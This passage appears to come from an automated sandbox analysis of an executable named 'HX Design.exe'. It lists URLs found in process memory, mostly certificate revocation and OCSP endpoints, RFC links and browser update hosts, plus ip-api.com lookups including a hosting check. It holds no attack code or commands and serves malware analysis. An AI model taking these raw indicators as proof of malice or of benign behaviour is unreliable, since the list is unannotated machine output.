              Source: HX Design.exe, 00000000.00000003.1668959482.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669052260.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678769674.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668871485.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678932216.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668118244.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668746422.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669162897.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1680565460.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676326380.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668028713.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668653035.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1675375438.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1677063982.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676435371.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668492693.000001631A8D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: HX Design.exe, 00000000.00000003.1668492693.000001631A8D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: HX Design.exe, 00000000.00000003.1668959482.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669052260.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678769674.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668871485.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678932216.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668118244.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668746422.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669162897.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1680565460.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676326380.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668028713.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668653035.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1675375438.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1677063982.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676435371.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668492693.000001631A8D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
              Source: HX Design.exe, 00000001.00000003.1701740081.00000294B46F3000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2098822310.00000294B447A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
              Source: HX Design.exe, 00000001.00000002.2101621757.00000294B5270000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
              Source: svchost.exe, 0000003C.00000003.1871820820.00000298F7A18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
              Source: svchost.exe, 0000003C.00000003.1871820820.00000298F7A18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
              Source: svchost.exe, 0000003C.00000003.1871820820.00000298F7A18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
              Source: svchost.exe, 0000003C.00000003.1871820820.00000298F7A18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
              Source: svchost.exe, 0000003C.00000003.1871820820.00000298F7A18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
              Source: svchost.exe, 0000003C.00000003.1871820820.00000298F7A18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
              Source: svchost.exe, 0000003C.00000003.1871820820.00000298F7A4D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
              Source: svchost.exe, 0000003C.00000003.1871820820.00000298F7A91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: HX Design.exe, 00000001.00000003.2087756770.00000294B46F3000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.1705144550.00000294B46F3000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2099257602.00000294B46F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
              Source: HX Design.exe, 00000001.00000003.1706357551.00000294B4C69000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2095458820.00000294B4C80000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100464730.00000294B4C80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
              Source: HX Design.exe, 00000001.00000003.1706757467.00000294B46B4000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2099002748.00000294B46B4000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100033257.00000294B4A50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
              Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545
              Source: HX Design.exe, 00000001.00000002.2099913329.00000294B4950000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
              Source: msedge.exe, 0000003B.00000002.1932159005.000076D800514000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
              Source: powershell.exe, 00000008.00000002.1815598451.00000197A9B26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1879970672.000001D183E0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1935866924.000001D192658000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1935866924.000001D192516000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es
              Source: HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
              Source: HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.esi
              Source: HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: HX Design.exe, 00000000.00000003.1668959482.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669052260.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678769674.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668871485.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678932216.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668118244.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668746422.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669162897.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1680565460.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676326380.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668028713.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668653035.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1675375438.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1677063982.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676435371.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668492693.000001631A8D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: HX Design.exe, 00000000.00000003.1668959482.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669052260.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678769674.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668871485.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669276073.000001631A8DD000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678769674.000001631A8DE000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678932216.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668118244.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668746422.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668871485.000001631A8DD000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669162897.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1680565460.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676326380.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668028713.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668653035.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1675375438.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1677063982.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676435371.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668492693.000001631A8D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
              Source: HX Design.exe, 00000000.00000003.1668959482.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669052260.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678769674.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668871485.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669276073.000001631A8DD000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678769674.000001631A8DE000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678932216.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668118244.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668746422.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668871485.000001631A8DD000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669162897.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1680565460.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676326380.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668028713.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668653035.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1675375438.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1677063982.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676435371.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668492693.000001631A8D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
              Source: HX Design.exe, 00000000.00000003.1668959482.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669052260.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678769674.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668871485.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678932216.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668118244.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668746422.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669162897.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1680565460.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676326380.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668028713.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668653035.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1675375438.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1677063982.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676435371.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668492693.000001631A8D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
              Source: HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
              Source: powershell.exe, 00000028.00000002.1879970672.000001D1826D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: HX Design.exe, 00000001.00000003.2095458820.00000294B4C80000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2098822310.00000294B4410000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100464730.00000294B4C80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/
              Source: HX Design.exe, 00000001.00000003.2092472989.00000294B53EA000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2102278462.00000294B53EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/R
              Source: HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
              Source: powershell.exe, 00000008.00000002.1793887408.0000019799CDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 00000008.00000002.1793887408.0000019799AB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1879970672.000001D1824A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000008.00000002.1793887408.0000019799CDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100464730.00000294B4DB4000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096001614.00000294B4DB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-76
              Source: HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2102914247.00000294B5C5C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc5234
              Source: HX Design.exe, 00000001.00000002.2101500679.00000294B5160000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
              Source: HX Design.exe, 00000001.00000002.2102914247.00000294B5BA4000.00000004.00001000.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2102914247.00000294B5C5C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6455#section-5.2
              Source: HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: HX Design.exe, 00000000.00000003.1677851703.000001631A8D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: chrome.exe, 0000003A.00000002.1927910627.00002F040022C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000003B.00000002.1928665494.000076D800234000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://unisolated.invalid/
              Source: chrome.exe, 0000003A.00000002.1927910627.00002F040022C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://unisolated.invalid/(
              Source: HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
              Source: HX Design.exe, 00000001.00000003.2095387308.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088687906.00000294B4DF5000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088801759.00000294B4DFC000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2101063626.00000294B4E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl
              Source: HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
              Source: HX Design.exe, 00000001.00000003.2095387308.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088687906.00000294B4DF5000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088801759.00000294B4DFC000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2101063626.00000294B4E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crlug
              Source: HX Design.exe, 00000001.00000002.2102278462.00000294B541E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm
              Source: HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
              Source: HX Design.exe, 00000001.00000002.2102278462.00000294B541E000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
              Source: HX Design.exe, 00000001.00000002.2099002748.00000294B4694000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096462024.00000294B4748000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088968659.00000294B4748000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2099503241.00000294B47A9000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2097242552.00000294B47A8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.1879970672.000001D183C0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 00000028.00000002.1879970672.000001D1826D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: HX Design.exe, 00000001.00000002.2102278462.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2095458820.00000294B4C80000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2096854366.00000294B542F000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2100464730.00000294B4C80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/
              Source: msedge.exe, 0000003B.00000002.1925230365.000076D800058000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.chambersign.org1
              Source: HX Design.exe, 00000000.00000003.1668959482.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669052260.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678769674.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668871485.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1678932216.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668118244.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668746422.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1669162897.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1680565460.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676326380.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668028713.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668653035.000001631A8D0000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1675375438.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1677063982.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1676435371.000001631A8D1000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000000.00000003.1668492693.000001631A8D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
              Source: HX Design.exe, 00000001.00000002.2099002748.00000294B4650000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2098077553.00000294B298A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
              Source: HX Design.exe, 00000001.00000002.2100033257.00000294B4B1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
              Source: HX Design.exe, 00000001.00000003.2095387308.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088687906.00000294B4DF5000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088801759.00000294B4DFC000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2101063626.00000294B4E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
              Source: HX Design.exe, 00000001.00000003.2095387308.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088687906.00000294B4DF5000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088801759.00000294B4DFC000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2101063626.00000294B4E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
              Source: HX Design.exe, 00000001.00000003.2095387308.00000294B4E00000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088687906.00000294B4DF5000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088801759.00000294B4DFC000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2101063626.00000294B4E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cpsr
              Source: HX Design.exe, 00000001.00000003.2096462024.00000294B4748000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000003.2088968659.00000294B4748000.00000004.00000020.00020000.00000000.sdmp, HX Design.exe, 00000001.00000002.2099380626.00000294B4748000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wwwsearch.sf.net/):
